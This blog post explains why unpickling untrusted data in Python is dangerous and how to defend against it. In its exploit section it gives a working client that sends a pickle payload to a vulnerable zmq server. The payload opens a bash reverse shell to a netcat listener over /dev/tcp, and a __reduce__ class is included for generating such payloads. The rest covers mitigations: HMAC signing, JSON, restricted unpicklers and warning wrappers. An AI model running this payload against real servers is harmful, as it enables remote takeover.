Playing with Pickle Security

Reading about the latest vulnerabilities in Rails got me thinking about a similar issue we have in Python.

It is well known that using pickle on untrusted data is insecure to the point of allowing arbitrary code execution. Or at least it should be.

If we head to the official documentation for pickle we’ll find this warning:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Now, how many of us check the official pickle documentation (or the official docs for any other module) every time we’re going to use it? Even if we’ve read that warning before, it’s easy to forget it and mistake pickle for just another serialization format (especially when pickle is only a tool for solving some other problem). We might even be using someone else’s code that unpickles untrusted data.

Pickle as a vulnerability

As a sanity check, to see if I was being paranoid, I went over to GitHub and ran a search for “pickle.loads”, which led to 36,375 results. After that, it took about 10 minutes to find a vulnerable project and exploit the vulnerability (actual code used by companies, not just some learn_pickle_test.py). I also found many “potentially vulnerable” projects, but didn’t take the time to demonstrate the issue on each of them.

Exploiting the vulnerability

The vulnerable code looks something like this:

import zmq

import cPickle as pickle

class Server(object):
    def __init__(self):
        context = zmq.Context()

        self.receiver = context.socket(zmq.PULL)
        self.receiver.bind("tcp://*:1234")

        self.sender = context.socket(zmq.PUSH)
        self.sender.bind("tcp://*:1235")

    def send(self, data):
        self.sender.send(pickle.dumps(data))

    def recv(self):
        data = self.receiver.recv()
        return pickle.loads(data)

and at some point makes the server listen by doing:

server = Server()
server.recv()

Exploiting this is as easy as opening netcat with nc -l -p 9000 on a host the target server can reach and running:

import zmq

def main():
    server_host = '98.76.54.32'
    netcat_host = '12.34.56.78'

    context = zmq.Context()
    zmq_socket = context.socket(zmq.PUSH)
    zmq_socket.connect('tcp://%s:1234' % server_host)

    shellcode = "cposix\nsystem\np0\n(S'/bin/bash -i >& /dev/tcp/%s/9000 0>&1'\np1\ntp2\nRp3\n." % netcat_host
    zmq_socket.send(shellcode)
    # the target connects back to netcat_host:9000 and hands us a shell

if __name__ == "__main__":
    main()

This gives the attacker a shell as the user running the vulnerable code, and with it a great deal of control over the server and the possibility of escalating privileges (if the user is not already root!). This is a very simple exploit, and it will leave a trace of us being there (though we could erase it once we have shell access), but it is incredibly fast and easy to write. It’s possible to write much more sophisticated exploits with a bit of knowledge of the internals of pickle. The shellcode we’re using in the example, or any other, can be generated with code like this:

import os
import cPickle

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('ls',))

shellcode = cPickle.dumps(Exploit())
print shellcode

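This works because pickle is a very simple stack language, and any object can declare how it should be pickled by defining a __reduce__ method. That method returns a callable and a tuple of arguments, and the unpickler calls the callable with those arguments to rebuild the object. Nothing requires the callable to be a constructor.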
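To see the mechanism without running anything dangerous, here is a minimal Python 3 sketch (the examples above are Python 2). The Demo class is a hypothetical stand-in for Exploit: its __reduce__ asks the unpickler to call the harmless built-in sorted instead of os.system, and pickletools.dis prints the opcodes of the resulting stack program without executing it.

```python
import pickle
import pickletools


class Demo(object):
    """Harmless stand-in for Exploit: asks the unpickler to call sorted()."""

    def __reduce__(self):
        # (callable, args): the unpickler will call sorted([3, 1, 2])
        return (sorted, ([3, 1, 2],))


# Protocol 0 is the text protocol, the same one used by the payload above.
payload = pickle.dumps(Demo(), protocol=0)

# Disassemble the payload; this only reads the opcodes, it does not run them.
pickletools.dis(payload)

# Loading the payload performs the call and returns its result.
result = pickle.loads(payload)
print(result)
```

What comes back is the return value of the call, not a Demo instance. The unpickler never checks that the callable has anything to do with the object that was pickled.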

Protecting ourselves

Only unpickle stuff you pickled yourself

This is harder than it sounds. At first we might trust anything that comes from our own infrastructure (i.e., if it’s in the DB, Redis, the cache, etc., then I can trust it), but anyone who can write to those stores can also exploit this vulnerability. An example would be restricting the server above to accept connections only from localhost, but running it on shared hosting, where other users of the same machine can still reach it.
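One common way to check that a pickle really is one we produced is to authenticate it with an HMAC before loading it. The following is a rough Python 3 sketch, not a complete solution: SECRET_KEY, signed_dumps and signed_loads are names made up for illustration, and it assumes the key is known only to trusted code. Anyone who can read the key can still forge payloads.

```python
import hashlib
import hmac
import pickle

# Assumption: a secret shared only by the code that writes and reads pickles.
SECRET_KEY = b"replace-with-a-real-secret"
DIGEST_SIZE = hashlib.sha256().digest_size


def signed_dumps(obj, key=SECRET_KEY):
    """Pickle obj and prepend an HMAC-SHA256 tag computed over the pickle."""
    data = pickle.dumps(obj)
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return tag + data


def signed_loads(blob, key=SECRET_KEY):
    """Verify the tag first; only unpickle when it matches."""
    tag, data = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    # compare_digest avoids leaking how many leading bytes matched.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to unpickle")
    return pickle.loads(data)
```

The important detail is the order: the signature is checked before pickle.loads ever sees the bytes, so a tampered payload is rejected without being executed.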

Just avoid pickle

The easiest way of protecting ourselves is to not use pickle unless it’s actually necessary, and to check our dependencies to see if they are vulnerable to these (and other) attacks. If all we need is a serialization format for data, JSON is probably enough.
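As a rough illustration of the JSON route (Python 3), the two helpers below could stand in for the pickle.dumps and pickle.loads calls in a server like the one above. The names encode_message and decode_message are hypothetical, and the sketch assumes the messages only contain dicts, lists, strings, numbers, booleans and None.

```python
import json


def encode_message(data):
    """Serialize plain data to UTF-8 encoded JSON bytes."""
    return json.dumps(data).encode("utf-8")


def decode_message(raw):
    """Parse JSON bytes; parsing only builds plain data, it never calls code."""
    return json.loads(raw.decode("utf-8"))


message = {"job": "resize", "width": 640, "tags": ["a", "b"]}
wire = encode_message(message)
print(decode_message(wire))
```

Feeding the pickle payload from the exploit to decode_message simply fails with a ValueError, because it is not valid JSON.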

Don’t trust anyone

This is just another case of attackers using unvalidated data to break into our system. As with any user-submitted data, we need to somehow make sure that it is not being spoofed and/or that our code can handle malicious data gracefully (also harder than it sounds).
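If pickle cannot be avoided, the standard library documentation describes restricting which globals the unpickler may resolve by overriding Unpickler.find_class. The sketch below (Python 3) follows that approach. The allow-list and the names RestrictedUnpickler and restricted_loads are illustrative choices, and this narrows the attack surface rather than making pickle safe for untrusted input.

```python
import builtins
import io
import pickle

# Assumption: these are the only globals our own pickles ever need.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle asks for a global such as os.system.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def restricted_loads(data):
    """Like pickle.loads, but refuses any global outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers and numbers never go through find_class, so they load as usual, while a payload that references os.system (or any other global that is not listed) raises UnpicklingError before anything is called.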

Better interfaces

The best way to avoid seeing any vulnerability in the wild is to educate ourselves to know when a piece of code is vulnerable. As API developers, one way we can help is by making sure that unsafe actions raise the necessary warnings or are self-documenting. In the case of pickle I’d like to see:

>>> with insecure_deserialization:
...     pickle.loads(x)
{}

# or

>>> pickle.loads(s)
SecurityWarning: Never unpickle data received from an untrusted or unauthenticated source.
{}

# or

>>> pickle.load_trusted_string(s)
{}
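None of these interfaces exist in the standard library, but two of them are easy to approximate in our own code. The following Python 3 sketch is only one possible shape for such a wrapper: SecurityWarning, loads and load_trusted_string are hypothetical names taken from the wish list above, not real pickle APIs.

```python
import pickle
import warnings


class SecurityWarning(UserWarning):
    """Hypothetical warning category; not part of the standard library."""


def loads(data):
    """Wrapper around pickle.loads that warns on every call."""
    warnings.warn(
        "Never unpickle data received from an untrusted or "
        "unauthenticated source.",
        SecurityWarning,
        stacklevel=2,  # point the warning at the caller, not at this wrapper
    )
    return pickle.loads(data)


def load_trusted_string(data):
    """Same behaviour as pickle.loads; the name records the caller's claim."""
    return pickle.loads(data)
```

Neither function makes unpickling any safer. The point is that the risk becomes visible at the call site, where a reviewer can ask why the data is considered trusted.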